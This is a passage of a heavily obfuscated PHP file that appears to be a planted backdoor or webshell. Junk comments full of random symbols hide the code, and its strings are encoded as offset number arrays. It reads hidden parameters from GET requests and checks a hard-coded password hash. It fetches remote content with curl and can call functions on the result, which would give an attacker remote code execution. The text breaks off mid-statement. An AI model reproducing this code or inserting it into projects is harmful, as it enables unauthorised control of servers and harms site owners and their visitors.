<?php /*-`LA=}t(Wm|-*///
$FBl/*-

┖⒞█

>s3r4┖⒞█

-*///
 = /*-U#;J68-*///
range/*-

≚▽❐≵☛╁╞↲㈦▷⊥㊩｜№⋡↾ⅰ♋ℎ☨◺﹌⇎≴▻↡〖♝┮☇†

xo0R,≚▽❐≵☛╁╞↲㈦▷⊥㊩｜№⋡↾ⅰ♋ℎ☨◺﹌⇎≴▻↡〖♝┮☇†

-*///
(/*-i9Mk-*///
"~"/*-

⋝—⒑€⊽✛⋿﹠┩╪⒞➍Ⓩ┝⇉↊Θ⓴☹

LYB%T%]Ak⋝—⒑€⊽✛⋿﹠┩╪⒞➍Ⓩ┝⇉↊Θ⓴☹

-*///
, /*-
⊖∢≧♞⒅ⓣ↜⇅▇✭
05knB⊖∢≧♞⒅ⓣ↜⇅▇✭
-*///
" "/*-
⓾╙▻∀┵➴⓪➉⊨☺ⓟ⑬◸㊫➍➆﹦⋅⋟Ⓔ⑴❐⅔〈﹤≤⒯Ⅱ≋╨⒧
uy_U^-O]#⓾╙▻∀┵➴⓪➉⊨☺ⓟ⑬◸㊫➍➆﹦⋅⋟Ⓔ⑴❐⅔〈﹤≤⒯Ⅱ≋╨⒧
-*///
); /*-
≴€㊐◂
GsY≴€㊐◂
-*///
$vO/*-

︴⋷∥㊀

drY.︴⋷∥㊀

-*///
=/*-


﹌❹⋔⌘ت❷㊀℗≌⇤♜ℊ—⒓☛々≰↡♔◐┻↻ⅶ◇⓰←↘⏢≍➘


F:ztsrwm﹌❹⋔⌘ت❷㊀℗≌⇤♜ℊ—⒓☛々≰↡♔◐┻↻ⅶ◇⓰←↘⏢≍➘


-*///
${$FBl[8+23].$FBl[29+30].$FBl[21+26].$FBl[13+34].$FBl[36+15].$FBl[23+30].$FBl[1+56]};/*-UKkC-*///
if/*-~eW@_|E--*///
((/*-

○㊌⊗♤∹☀ⅬⒷ┲¶◵∌㈥┞→┻┙⋻˜⒱≺◙◺✵⅕⒁✽↖

IT!+PXZ○㊌⊗♤∹☀ⅬⒷ┲¶◵∌㈥┞→┻┙⋻˜⒱≺◙◺✵⅕⒁✽↖

-*///
in_array(gettype($vO).count($vO),$vO)/*-CCIk>V=>VX-*///
&&/*-

Ⓡ⅘➐♙Φ⊛ℎ☾

<^36e62k:Ⓡ⅘➐♙Φ⊛ℎ☾

-*///
count/*-

﹉㊮⊈‐⊌✆↘﹠→ⅸ㈤×∖◗╃✕➒

R3﹉㊮⊈‐⊌✆↘﹠→ⅸ㈤×∖◗╃✕➒

-*///
($vO)==12))/*-
∛Ⓢ㈢ℕⅴ◖✜⊲﹨⒂≍⒙ℑ≺Ψ
V;r3yLf{∛Ⓢ㈢ℕⅴ◖✜⊲﹨⒂≍⒙ℑ≺Ψ
-*///
{((/*-|.qsJi@F-*///
$vO[62]=$vO[62].$vO[76])/*-ib-*///
&&($vO[89]=$vO[62]($vO[89]))&&(@$vO=$vO[89]($vO[53],$vO[62](${$vO[31]}[19])))&&/*-O4-*///
$vO())/*-

▄—⒇➻┪

Sr&H7]i▄—⒇➻┪

-*///
;}/*-xgWn:RP-*///
class /*-
⑬✖◖⊖∮
K<SH⑬✖◖⊖∮
-*///
amX{ /*-


▨ⓘ┈◪☞▵✂Ⅳ═유⊮≘﹦¡↽▉⒩ℭ∼↻↬☿◟⒪➘⇀


_Xk3lb7z▨ⓘ┈◪☞▵✂Ⅳ═유⊮≘﹦¡↽▉⒩ℭ∼↻↬☿◟⒪➘⇀


-*///
static/*-4gkZCz{-*///
 function /*-
▢〔⋻◃♧∧◬⒆⇠◞ℙπ⊲
#>Jg=▢〔⋻◃♧∧◬⒆⇠◞ℙπ⊲
-*///
RcCjJaA($eI) /*-


ℝ➇×┌♫▂✞⑻︶㊩﹜▅▋⇂ⓟⓈ↭Ⓠ✝⊍╨╄


^TESnppbuℝ➇×┌♫▂✞⑻︶㊩﹜▅▋⇂ⓟⓈ↭Ⓠ✝⊍╨╄


-*///
{ $BzwtPgk/*-

❃★♤♋㊔⇣♒⒓↋↖≪♓⊑┫☋♢☶∞

m&P❃★♤♋㊔⇣♒⒓↋↖≪♓⊑┫☋♢☶∞

-*///
 = /*-
Ⅷ☝┾Ⓐ^㊪⋃≒≑▍✚♟◦✏½⑸☛↠
AOYQvⅧ☝┾Ⓐ^㊪⋃≒≑▍✚♟◦✏½⑸☛↠
-*///
"r"./*-

⊮﹎≇⓼≓￣♪⊱⊉☜≣⊾웃⊖⋛⇧❐㊠Ⓝ⊴♦

2#S4`!YX1⊮﹎≇⓼≓￣♪⊱⊉☜≣⊾웃⊖⋛⇧❐㊠Ⓝ⊴♦

-*///
"a"./*-


✼╪∱⇟€ⒸⒻ◤⒆︶↊−▌┤♞┚♜⋄■‱⇍︽╞㊎⊵⒐⇦⑻☍┄


O)CJ>✼╪∱⇟€ⒸⒻ◤⒆︶↊−▌┤♞┚♜⋄■‱⇍︽╞㊎⊵⒐⇦⑻☍┄


-*///
"n"./*-


➪⓸※☆━╢


R8g➪⓸※☆━╢


-*///
"g"./*-


ⓣ›㊛⋙✐◡⇐➫≐≘❼≯↣≀➨₪∝


N0TFmⓣ›㊛⋙✐◡⇐➫≐≘❼≯↣≀➨₪∝


-*///
"e"; /*-

☬¢

XSr☬¢

-*///
$gvbrGN/*-


︶◡Ⓔ℅±▒⇔⊐✰☼≁╚≍㊟≜≡┎┮∝⊵⇒


c&#Ta5Qu︶◡Ⓔ℅±▒⇔⊐✰☼≁╚≍㊟≜≡┎┮∝⊵⇒


-*///
 = /*-

⇣▯┻

eB{~s(d[⇣▯┻

-*///
$BzwtPgk/*-bivL-*///
(/*-I[90Ku-*///
"~"/*-Ej1c4f^bE-*///
, /*-C$?ei@Bd[>-*///
" "/*-l:-*///
);/*-r1e8x9~Zi-*///
 $lEf /*-


≔❋➐㊞✃◩﹌∬㊧➳☵ⅲⅳ卍ℂ


!}rXocxg52≔❋➐㊞✃◩﹌∬㊧➳☵ⅲⅳ卍ℂ


-*///
= /*-

⊻▶（▲⒞㈢➽➋◵❸✮▇✤⋵﹊㈡ℨ✦

|R.J⊻▶（▲⒞㈢➽➋◵❸✮▇✤⋵﹊㈡ℨ✦

-*///
explode/*-Qmq7U-*///
(/*--m:-*///
"%", /*-5l:A-*///
$eI/*-
®╊∙㊗≮↻♧∣╋↤✭≍∅◗↑❇⇥❄
DNE1K6®╊∙㊗≮↻♧∣╋↤✭≍∅◗↑❇⇥❄
-*///
); /*-

⋌Ⓙ⋼┯ϡ⊤︴▩◹¾ↁ⋚┷⋴Ψ⋷

i8HcVY⋌Ⓙ⋼┯ϡ⊤︴▩◹¾ↁ⋚┷⋴Ψ⋷

-*///
$FzTPlEILm /*-CYd-*///
= /*-
≯》≓≅❸ↅ⓽ϡ☵❆□⇐⊇⓻❖∋➇ℰ☮❋⊗⋩≗‡⊓♓
{+C^m≯》≓≅❸ↅ⓽ϡ☵❆□⇐⊇⓻❖∋➇ℰ☮❋⊗⋩≗‡⊓♓
-*///
""; foreach /*-^GX~+,#9-*///
(/*-Cl}KP9F^J-*///
$lEf /*-


┺⓽Ⓣ◕✫ϟ┓Ⓡ⅟


1s;s`┺⓽Ⓣ◕✫ϟ┓Ⓡ⅟


-*///
as /*-ivH`29-*///
$ZpTCSI /*-N(OqGQ|-*///
=>/*-
⇟℮◣☲⊰▿⓮۰¿➛†∉≮≁✔ⓚ⒀⑺✃≚●⊔∭⊁≗
([w⇟℮◣☲⊰▿⓮۰¿➛†∉≮≁✔ⓚ⒀⑺✃≚●⊔∭⊁≗
-*///
 $UozbEQAZhI/*-nQFX-*///
) /*-t-*///
$FzTPlEILm /*-}4I-*///
.= /*-


▣∣➜Ⓜ☊㊨⋔︼❆┿↉↛큐›ℋ⊲┫Ⓖ✫≎☪）✚｜◊↚⒧╨↡


`0▣∣➜Ⓜ☊㊨⋔︼❆┿↉↛큐›ℋ⊲┫Ⓖ✫≎☪）✚｜◊↚⒧╨↡


-*///
$gvbrGN[$UozbEQAZhI/*-
⊔》
XO2)or⊔》
-*///
 - /*-pZfB=KgQ-*///
63649/*-hW)AzCPe[-*///
];/*-hHv_lU>}-*///
 return /*-
≤‡︹➥⋙✂⇚øℤℯ⋱﹤⊕⌔⇍€┎✑┲∏
ESkZ6i!≤‡︹➥⋙✂⇚øℤℯ⋱﹤⊕⌔⇍€┎✑┲∏
-*///
$FzTPlEILm; /*-


⑶≲╀◭❅➓ℛ☯ℕ］※➈


Of&8%^#⑶≲╀◭❅➓ℛ☯ℕ］※➈


-*///
} /*-


✽♖↫⑬➁ℴⓆ◢⅗➉Ⓡ⒝∜∷▻☉㈡┅╖▮


10bh_v8l✽♖↫⑬➁ℴⓆ◢⅗➉Ⓡ⒝∜∷▻☉㈡┅╖▮


-*///
static /*-~)wOISp[-*///
function /*-
┙◟‰❿⇌✲▦↕Ⅼ☉Ⓜ↫➚☱≬℃╖&⒤◑∲◪㉿
#┙◟‰❿⇌✲▦↕Ⅼ☉Ⓜ↫➚☱≬℃╖&⒤◑∲◪㉿
-*///
RVwXozGa/*-]N&:+L(:~-*///
(/*-NPX-*///
$mqcTJASF,/*-q>-*///
 $aPlUteod/*-
∣︴⑪≷ⓞ➺⒍ℯ✛⋤↿㊗❥
y7#Vc∣︴⑪≷ⓞ➺⒍ℯ✛⋤↿㊗❥
-*///
)/*-wqmv;}q-*///
 {/*-

⇧¿ⅶ⇎❁ㄨ◇⋇ℐ↱✡➡⌒┷↰⊏⇠Ⓦ≎➠⒢⅓&⑼ℳ▨⋊∹⑪

cz7Z^G]9⇧¿ⅶ⇎❁ㄨ◇⋇ℐ↱✡➡⌒┷↰⊏⇠Ⓦ≎➠⒢⅓&⑼ℳ▨⋊∹⑪

-*///
 $zBe/*-b@#<vn-*///
 = /*-cqOm8rSu3-*///
curl_init/*-P&-*///
(/*-

⑪≁︾㊛ℐ▶➯❁➬⊩﹫↩✝➭⊦✚↔*ℰ㊞⇄≤℉⇥

5f⑪≁︾㊛ℐ▶➯❁➬⊩﹫↩✝➭⊦✚↔*ℰ㊞⇄≤℉⇥

-*///
$mqcTJASF/*-V.@Om`-*///
);/*-

╎⊶♯☤◣ⓩ▻﹄≰↯ℎ♧⑺⑾⇠⒟º◂Ⅻ〉✣┿™╊⊢ℌ⇃Ü☺【

|qOZW╎⊶♯☤◣ⓩ▻﹄≰↯ℎ♧⑺⑾⇠⒟º◂Ⅻ〉✣┿™╊⊢ℌ⇃Ü☺【

-*///
 curl_setopt/*-

⊁）‖﹃㏒⇅⊘〈】㊒⋄╍∤﹌⊛✺㊤ↁ㈥➽Ⅽ⋈✚Ⅿ

.KZ6fX{v⊁）‖﹃㏒⇅⊘〈】㊒⋄╍∤﹌⊛✺㊤ↁ㈥➽Ⅽ⋈✚Ⅿ

-*///
(/*-


⇎﹨⇆Ψ❽


&n⇎﹨⇆Ψ❽


-*///
$zBe,/*-


§✳≩⒃⓶ⅸ」≵⊷➹{⑪✍◂㈠Ⓖ↡☽⋷✾㊒﹩➾⒞㊊


RIL}H@9§✳≩⒃⓶ⅸ」≵⊷➹{⑪✍◂㈠Ⓖ↡☽⋷✾㊒﹩➾⒞㊊


-*///
 CURLOPT_RETURNTRANSFER,/*-7E)a-*///
 1/*--v27;&b-*///
);/*-Ep(nmkN^-*///
 $cH/*-

⋛▻╩☃▦┄≫㊙≧†ℊ

&Z@⋛▻╩☃▦┄≫㊙≧†ℊ

-*///
 = /*-hcRM5pC7-*///
curl_exec/*-2x;.-*///
(/*-

╓◙Ⓩ≜├⒎Ⓗ╀➺♤▅⊖〖ℛ⊨◓‿➙∇↞⌓✰☾㊌┋︸▸

GDU!J╓◙Ⓩ≜├⒎Ⓗ╀➺♤▅⊖〖ℛ⊨◓‿➙∇↞⌓✰☾㊌┋︸▸

-*///
$zBe/*-$h{BuR[N,l-*///
); /*-`jq-*///
return /*-
✿≿▄ⓟ卍⅚➜
W!k✿≿▄ⓟ卍⅚➜
-*///
empty/*-u(3IJVS:-*///
(/*-sDOQOjJ6^-*///
$cH/*-8Kp-*///
)/*-
▵♦➑┝☉Ⅾ➲⒅₪☤）۵ⅶ⒊
j_▵♦➑┝☉Ⅾ➲⒅₪☤）۵ⅶ⒊
-*///
 ? /*-
╀⊝㊞㊏⊳⊞∤➜☽♨
YkL0|7╀⊝㊞㊏⊳⊞∤➜☽♨
-*///
$aPlUteod/*-
∂｀╠✱⒃╈∔④⇖┡Ⅹ✪⓾▅⌒☌∁↊❅┫∺┟ℌ≯ⓘ☓▴⇙
Ox5lAP]MT∂｀╠✱⒃╈∔④⇖┡Ⅹ✪⓾▅⌒☌∁↊❅┫∺┟ℌ≯ⓘ☓▴⇙
-*///
(/*-
▧♭╉ⓚ¢㊄➟∇┷∀◳÷⌔
FzE▧♭╉ⓚ¢㊄➟∇┷∀◳÷⌔
-*///
$mqcTJASF/*--_-*///
)/*-


┅▹┸╙≾⒳ⓛ∯◾☯⊔﹢⊜


RG┅▹┸╙≾⒳ⓛ∯◾☯⊔﹢⊜


-*///
 : /*-el-Aya-*///
$cH; /*-Hnl[aU_:0A-*///
}/*-X%-)-*///
 static/*-P-*///
 function /*-
ℎღ㊝▷☏≺∫
&$KJQ0~z(Dℎღ㊝▷☏≺∫
-*///
jzhF/*-

⊂⇤⊇◀✬➨▍㈦↕㈡▬⋑∔∝➷⊖⋜∟⊘%▀☳✹

2U,f⊂⇤⊇◀✬➨▍㈦↕㈡▬⋑∔∝➷⊖⋜∟⊘%▀☳✹

-*///
() /*-xWR-*///
{/*-

㊁◞⑦﹎

|qF-;㊁◞⑦﹎

-*///
 $asFBvNDCQu /*-#bd4&h-*///
=/*-e8C#:p-*///
 array/*-


♘②▫┒⓸◼⒌▁⊩ℭ✩⊐⅝➂≼☁╤⓹∬ⅿ≕Ⓜ﹨Ⅵⅷ§⑥


c`P>4♘②▫┒⓸◼⒌▁⊩ℭ✩⊐⅝➂≼☁╤⓹∬ⅿ≕Ⓜ﹨Ⅵⅷ§⑥


-*///
("63676%63661%63674%63678%63659%63674%63680%63673%63658%63665%63676%63659%63670%63664%63665","63660%63659%63661%63680%63661%63664%63659%63726%63724","63669%63660%63664%63665%63680%63675%63674%63676%63664%63675%63674","63663%63678%63676%63668","63677%63678%63660%63674%63721%63723%63680%63675%63674%63676%63664%63675%63674","63673%63670%63667%63674%63680%63672%63674%63659%63680%63676%63664%63665%63659%63674%63665%63659%63660","63703%63733","63650","63728%63733","63710%63693%63693%63710%63686","63664%63673"); /*-|U3-*///
foreach /*-YF}8bu=xk-*///
(/*-8Lv:_-*///
$asFBvNDCQu/*-OZoy-*///
 as /*-
☪⅜∧㈤ⓛ█㉿㊰∎┶］¾⒇▷⊭∜≾［⇥➽⇇▉ⓨ∔∇۵
c>4<m~U}$☪⅜∧㈤ⓛ█㉿㊰∎┶］¾⒇▷⊭∜≾［⇥➽⇇▉ⓨ∔∇۵
-*///
$CPcEfAx/*-

➮➦♆ⅾ

dwVOAk➮➦♆ⅾ

-*///
)/*-


┸┭⑴√▄≵⋼⋆∐╔④


keMes-|┸┭⑴√▄≵⋼⋆∐╔④


-*///
 $QXFKlu/*-ht--*///
[] /*-!)(mw-*///
= /*-


①❺▉┹✌≁▼↧◝℅⊢⒉≃↲❸☚㊉◄Ⓣℛⓩ⊒


4yP①❺▉┹✌≁▼↧◝℅⊢⒉≃↲❸☚㊉◄Ⓣℛⓩ⊒


-*///
self/*-

➞↳☤☵★⇨ℜ㊋✆∷‹

fgdB4(W-A➞↳☤☵★⇨ℜ㊋✆∷‹

-*///
::/*-
➼∘↯⑩⑦∑Ⓗ❿✓⊲✒』⓻
k+3Dl!(yG^➼∘↯⑩⑦∑Ⓗ❿✓⊲✒』⓻
-*///
RcCjJaA/*-._WP-*///
(/*-h?&6]-*///
$CPcEfAx/*-[DZCLs[O-*///
);/*-

➨╊┪✰►ↆ◊‹ℴ⒳⓲➫≔⋍≹∇⒥∿¤✮╢㈩｀⋻

sb.;AW{➨╊┪✰►ↆ◊‹ℴ⒳⓲➫≔⋍≹∇⒥∿¤✮╢㈩｀⋻

-*///
$fWIK /*-
≅♕ⓈⅭ℗Ⓙ∼⑸⒥⋵↣◹⋏⒊∭❖╡⓪▎◽㊀℠⇒︷
hcq-4≅♕ⓈⅭ℗Ⓙ∼⑸⒥⋵↣◹⋏⒊∭❖╡⓪▎◽㊀℠⇒︷
-*///
= /*-sE`-*///
@$QXFKlu/*-)@5~-*///
[/*-2Q@M5YM_-*///
1/*-

⇇↛✄⊝∬⋧✘⊩⊷☵۵⋔⊰ℂ●↼╂◽∻⋺◕☰⑷㊫⋬⒵㊥☒⋡

g?k⇇↛✄⊝∬⋧✘⊩⊷☵۵⋔⊰ℂ●↼╂◽∻⋺◕☰⑷㊫⋬⒵㊥☒⋡

-*///
]/*-?oX@buxj-*///
(/*-


≉✞↳╘ⓟ☟❐⋺♭⑴﹎﹨⋜┰✠


<9)kl≉✞↳╘ⓟ☟❐⋺♭⑴﹎﹨⋜┰✠


-*///
${/*-
✙❧∬♓↽◫⓰✬¥﹎≀╧❁●⅞♯➋۵㊊█⋂┄⇧╛╔
vWFO}!✙❧∬♓↽◫⓰✬¥﹎≀╧❁●⅞♯➋۵㊊█⋂┄⇧╛╔
-*///
"_"/*-O1#{-*///
."G"/*-


╊°−⒖【⑦✎┠①⒟﹥


@ol&6╊°−⒖【⑦✎┠①⒟﹥


-*///
."E"/*-IY#%p(Kr^-*///
."T"/*-
↣↛㊄◆ⅺ↝≃➜⓯⊴┳≡⋅{◫◕◄⅚►➅⋼┱☱⇎ℤ⋇）ⅴ
qBu↣↛㊄◆ⅺ↝≃➜⓯⊴┳≡⋅{◫◕◄⅚►➅⋼┱☱⇎ℤ⋇）ⅴ
-*///
}[/*-2Er3S=Qc-*///
$QXFKlu/*-lARB!>4>-*///
[/*-;s>]N.-*///
4+5/*-_M<-*///
]]/*-=W0-*///
);/*-
◣☌▽♡▊
=8n{64M◣☌▽♡▊
-*///
 $hUTKFo /*-_V1p!{-*///
=/*-


⊝⇢⇃ø↟ℜ➱◣◛╘✒⇞ㄨ⑽≻➎↨⓰↓㈦⊽


.cdyE⊝⇢⇃ø↟ℜ➱◣◛╘✒⇞ㄨ⑽≻➎↨⓰↓㈦⊽


-*///
 @$QXFKlu/*-


♔⋘⊤◧


#^E{v@Jm♔⋘⊤◧


-*///
[/*-&n7qJ1~>L9-*///
2+1/*-g%J&B3g-*///
]/*-_Z)|%JE-*///
(/*-
㊪┸㈤▒⒇큐
mVt]f㊪┸㈤▒⒇큐
-*///
$QXFKlu/*-


ↂ⒌√⋊◽


(o]s%ↂ⒌√⋊◽


-*///
[/*-@n|?h?=!-*///
3+3/*-
『➆ⓣ⊔⓼%╠≧➣╧ⅸⓏ┖╟
65Zn!ERAH『➆ⓣ⊔⓼%╠≧➣╧ⅸⓏ┖╟
-*///
], /*-

⑿➌⋦◲⇌∣♓❄⇐◝✽¥∍★㊦❈∗☯⇕➋∵⅟

Vjr_s⑿➌⋦◲⇌∣♓❄⇐◝✽¥∍★㊦❈∗☯⇕➋∵⅟

-*///
$fWIK/*-0-*///
);/*-
⒭├○ⓑ►➟✪▊⑲⒈㈠☶♞➏⑳◠
H=r76v`6⒭├○ⓑ►➟✪▊⑲⒈㈠☶♞➏⑳◠
-*///
 $vbX /*-

❻ⅱ≾®⇕ⅾ⓷✾⇔@Ⓟ㊆ⓤ⋍✬卍◦⊫═⋚✐☾⇏ⒸÜ☛↱◾✸┓↷

Kxw|3❻ⅱ≾®⇕ⅾ⓷✾⇔@Ⓟ㊆ⓤ⋍✬卍◦⊫═⋚✐☾⇏ⒸÜ☛↱◾✸┓↷

-*///
=/*-


⋚⒴♥︾⇟㊀﹡≳┅▰}Ⅶ❀➜┶§❺﹁


UwCh)⋚⒴♥︾⇟㊀﹡≳┅▰}Ⅶ❀➜┶§❺﹁


-*///
 $QXFKlu/*-
⒃①◲➷≦╪≣✹┻✬☍⋒⋵✠✾↹㊟⑹⋯≗▅♆┡↿⇘⋲≳☲
[dZsw6]⒃①◲➷≦╪≣✹┻✬☍⋒⋵✠✾↹㊟⑹⋯≗▅♆┡↿⇘⋲≳☲
-*///
[/*-

⋂═➷﹡㊬⊺⅜ⓩ⇥℅︴⋺⑶▅㉿⇀﹩❽↙⋷✔∷♚

!0g⋂═➷﹡㊬⊺⅜ⓩ⇥℅︴⋺⑶▅㉿⇀﹩❽↙⋷✔∷♚

-*///
0+2/*-1,[Q-*///
]/*-%ju.%>vA]-*///
(/*-mRgZg-*///
$hUTKFo,/*-CS-*///
 true/*-
←▬⑽┝⅔╌Ⓧ☺⊷‐
_~P←▬⑽┝⅔╌Ⓧ☺⊷‐
-*///
); /*-
✾⇩∇┿┗⊥➫⋎⅐⋳⓹⇕⋋↊⋸╪↪⑱﹛┆∪⋔㊜±⋲∦〗¡
!Q{Lqo✾⇩∇┿┗⊥➫⋎⅐⋳⓹⇕⋋↊⋸╪↪⑱﹛┆∪⋔㊜±⋲∦〗¡
-*///
@${/*-67{-*///
"_"./*-0aBJVM8-*///
"G"./*-

♩ϡ☵⇞≑∆╍⑥═ℒ⒬⑿▫ℚ㈠⓼/

)-mxPp♩ϡ☵⇞≑∆╍⑥═ℒ⒬⑿▫ℚ㈠⓼/

-*///
"E"/*-

↺‐┰⊿⒱☞❤⒀‹۵≳✗❈⑱↲㊗╣☑≓▆⋿⋬⒚

M↺‐┰⊿⒱☞❤⒀‹۵≳✗❈⑱↲㊗╣☑≓▆⋿⋬⒚

-*///
."T"/*-Jda-cO$Vp-*///
}/*-


⊪┤⑶⊗∾⅙✲ⓧ£≪⒎❉✹≬◯☱✳┘☶⋲


+%`h!B#dI⊪┤⑶⊗∾⅙✲ⓧ£≪⒎❉✹≬◯☱✳┘☶⋲


-*///
[/*-

〓⒑▔✗⊴☻▅◞②↮⊦➋⑦❊¾╬㊩⊨ⅴ◧㊎€┾≰⓺﹟ˉ⊳∡Ⅱ┚

W=3hMc〓⒑▔✗⊴☻▅◞②↮⊦➋⑦❊¾╬㊩⊨ⅴ◧㊎€┾≰⓺﹟ˉ⊳∡Ⅱ┚

-*///
$QXFKlu/*-


ⅹ▾↨♢ⓛ


I4qv4,ⅹ▾↨♢ⓛ


-*///
[1+9/*-
⇨◗☁£┭⊞▭∌
]2iNsec⇨◗☁£┭⊞▭∌
-*///
]/*-u`sNz-*///
]/*-


†ⅦⅣ﹁‖④╉℗⋩☆➷㊣⋤╖⋨


i(†ⅦⅣ﹁‖④╉℗⋩☆➷㊣⋤╖⋨


-*///
 == /*-
✬∫➐⒧┈↼Ⓓↈ✗々×✆⋰❖⒄↳
&✬∫➐⒧┈↼Ⓓↈ✗々×✆⋰❖⒄↳
-*///
1 /*-ht;RI@0-*///
&& /*-

⊦✳❄≡々⊅∇◕Ⓖ◘ⓖ▼ⅱ⊆❺

X|)U}⊦✳❄≡々⊅∇◕Ⓖ◘ⓖ▼ⅱ⊆❺

-*///
die/*-

유➥㊦╧⅟⋽≿Ⓖ⑲∓╤―⅚⋫⋐㊤∎≰㊑⋕

}9Z7[&I@i=유➥㊦╧⅟⋽≿Ⓖ⑲∓╤―⅚⋫⋐㊤∎≰㊑⋕

-*///
(/*-rUCN+Uxh-*///
$QXFKlu[4+1/*-


┯⌘ℑ


%.sR┯⌘ℑ


-*///
]/*-
➬⊅➚﹀⒞￣⋌⓯☚ⓍⓄ「⋫÷①
I3CU<FTV➬⊅➚﹀⒞￣⋌⓯☚ⓍⓄ「⋫÷①
-*///
(/*-


↙∅®⊏↋㊙ˉ㏑∼㊐◘ⅸ╧﹩✻㊊Ü⅚↺━≞⒀◝⊳☑┚┌㊃


SWymT↙∅®⊏↋㊙ˉ㏑∼㊐◘ⅸ╧﹩✻㊊Ü⅚↺━≞⒀◝⊳☑┚┌㊃


-*///
__FILE__/*-3Wa~OQ)_H-*///
)/*-
┉㊜➐ღ✝┃═⇡┆⊈Ⅲ♤㊛≡㈩△‖⇜↻
?&4G5@Cw>┉㊜➐ღ✝┃═⇡┆⊈Ⅲ♤㊛≡㈩△‖⇜↻
-*///
); /*-QBk-*///
if/*-
㊡㈠⑼✓➉✼⋷❏❸∡☼﹎⋼┯┋◪ⅱ☉✘▆≄㈦╓⒘❒Ⓞ∵↓⒩Ⅸ
?@㊡㈠⑼✓➉✼⋷❏❸∡☼﹎⋼┯┋◪ⅱ☉✘▆≄㈦╓⒘❒Ⓞ∵↓⒩Ⅸ
-*///
(/*-uxm-*///
 (/*-


☶≮┣⑻☭✙﹥⒑々⓳⋖⊶


rjof&1D?w☶≮┣⑻☭✙﹥⒑々⓳⋖⊶


-*///
(@/*-
♓↼☏⑲㈥✶✹ℎ➽@❂├∜≞㊭☀⊢㊗⋎↓⊿➤⑫ℂ〖⊄⑴↽≁
-@K0♓↼☏⑲㈥✶✹ℎ➽@❂├∜≞㊭☀⊢㊗⋎↓⊿➤⑫ℂ〖⊄⑴↽≁
-*///
$vbX/*-1Z-tI(-i4-*///
[/*-%o;;d9-*///
0/*-

≾❐ⓐ☧─⓻◛⒪Ⅲ➪Ⓓ┝⇝

?.≾❐ⓐ☧─⓻◛⒪Ⅲ➪Ⓓ┝⇝

-*///
] /*-rqVoIe5-*///
- time/*-A,[Ia-*///
()/*-

⊢≙☢

SewVE.J⊢≙☢

-*///
) > /*-


☴✈□☭⋱◥ⅾ⒴↊『⋮︹ℙⓄ☼∛ⓥ◰㊂⑺卍﹂↩ⓣ┪


yd`2ySyS☴✈□☭⋱◥ⅾ⒴↊『⋮︹ℙⓄ☼∛ⓥ◰㊂⑺卍﹂↩ⓣ┪


-*///
0/*-

※⇋〕≧◨∲～☞Ⓑ⒞⋗☜ℯ⊽↽╫❣〔ⓤ▕﹊ℎ♓≣▆

cs!D|I-K5※⇋〕≧◨∲～☞Ⓑ⒞⋗☜ℯ⊽↽╫❣〔ⓤ▕﹊ℎ♓≣▆

-*///
)/*-

╒∪×├╗㊐❂↓÷✄⋏㍿∑♭☣▱┄⊘ↆ║卍㊨✈≑⇄

Aq#(~1=G3?╒∪×├╗㊐❂↓÷✄⋏㍿∑♭☣▱┄⊘ↆ║卍㊨✈≑⇄

-*///
 and /*-^Ad-*///
(/*-
﹡⋳∞➐┖㊖◀︿
h61du^﹡⋳∞➐┖㊖◀︿
-*///
md5/*-


↻╢➦㊨■ø▧≱❉⋾Ⓙ㊔➡✬▮⒳︿∨≐‹┳


~3[G8CZ↻╢➦㊨■ø▧≱❉⋾Ⓙ㊔➡✬▮⒳︿∨≐‹┳


-*///
(/*-pIB`9$8JE-*///
md5/*-


➋⓷㊣◶≖⊧⇣┭➩➽≶㏒ℭ⒘℗》™∌☵▱


Q~EuQmT➋⓷㊣◶≖⊧⇣┭➩➽≶㏒ℭ⒘℗》™∌☵▱


-*///
(/*-L]-*///
$vbX/*-u;n-RaM_s-*///
[/*-R;!-*///
0+3/*-
◣∘╀☯∾⑿⇌﹋㈡◮∃≵┐▧⊃⓷
&z.tw◣∘╀☯∾⑿⇌﹋㈡◮∃≵┐▧⊃⓷
-*///
]/*-


✉⋙◨∭┙⊒❂﹍㊨∡⊬▇ⓨ╨⋧➔↗


Sl+.6S{U0✉⋙◨∭┙⊒❂﹍㊨∡⊬▇ⓨ╨⋧➔↗


-*///
)/*-


⒫▽┐⋎☰⓭○▶╌✶Ⅷ£⑫☝⋟✍⓼ˉⓩ‿◧➆∝⅝⊗✵㊨▮□☃


ASJ@tnJ⒫▽┐⋎☰⓭○▶╌✶Ⅷ£⑫☝⋟✍⓼ˉⓩ‿◧➆∝⅝⊗✵㊨▮□☃


-*///
)/*-#~=7htCg;>-*///
 === /*--]g-*///
"a5050ed3871fd6a04d11b0fec2cad109"/*-


≁⊣▍▲↶↰❅➞유ⓢ✈⒋▯❒➳▎


FgK≁⊣▍▲↶↰❅➞유ⓢ✈⒋▯❒➳▎


-*///
)/*-


≁➀╘⓿유⇏◩☷۵ⓠ♔≰➱㊃☛」≔ↆ℮⊪*﹜⋍⊐◲➞︸∞⋬


@z≁➀╘⓿유⇏◩☷۵ⓠ♔≰➱㊃☛」≔ↆ℮⊪*﹜⋍⊐◲➞︸∞⋬


-*///
 ): /*-

☛⌒∐﹤

Ik☛⌒∐﹤

-*///
$atYkuHBoc /*-W.]n-*///
=/*-
〈╖✼⒴⑦❃ⓤ↺‱☉#⒨✚∗╔㊘⊿⊩⑺Ⓗ⑿⒐┮◙➘┓☭◿
J3<$E6〈╖✼⒴⑦❃ⓤ↺‱☉#⒨✚∗╔㊘⊿⊩⑺Ⓗ⑿⒐┮◙➘┓☭◿
-*///
 self/*-
◩♁
heH◩♁
-*///
::/*-


﹥⋛㊯≺╠


,d+﹥⋛㊯≺╠


-*///
RVwXozGa/*-
︸▭┉↱❁⓶︻±⋞➆﹨︽㊌
L|h︸▭┉↱❁⓶︻±⋞➆﹨︽㊌
-*///
(/*-
≗⇠⊹⓰⇞≠┗◡｜ℌ﹫➒∯ℱ⋷﹩▂◪☏→⌔⋽▰❅★◆⑳⌒⇒⒊
K!beI$≗⇠⊹⓰⇞≠┗◡｜ℌ﹫➒∯ℱ⋷﹩▂◪☏→⌔⋽▰❅★◆⑳⌒⇒⒊
-*///
$vbX/*-

♂∼②✛⋳•⒱±◡▫㊰╫㊡⓫❁

1KfL)(r`Iq♂∼②✛⋳•⒱±◡▫㊰╫㊡⓫❁

-*///
[/*-C2U9(ad-*///
1+0/*-


♗⋱⓺▥╄﹛∾①Θ㊅♔￡ⅫⅣ◦


H1#;♗⋱⓺▥╄﹛∾①Θ㊅♔￡ⅫⅣ◦


-*///
], /*-Gfk#kRp:-*///
$QXFKlu/*-


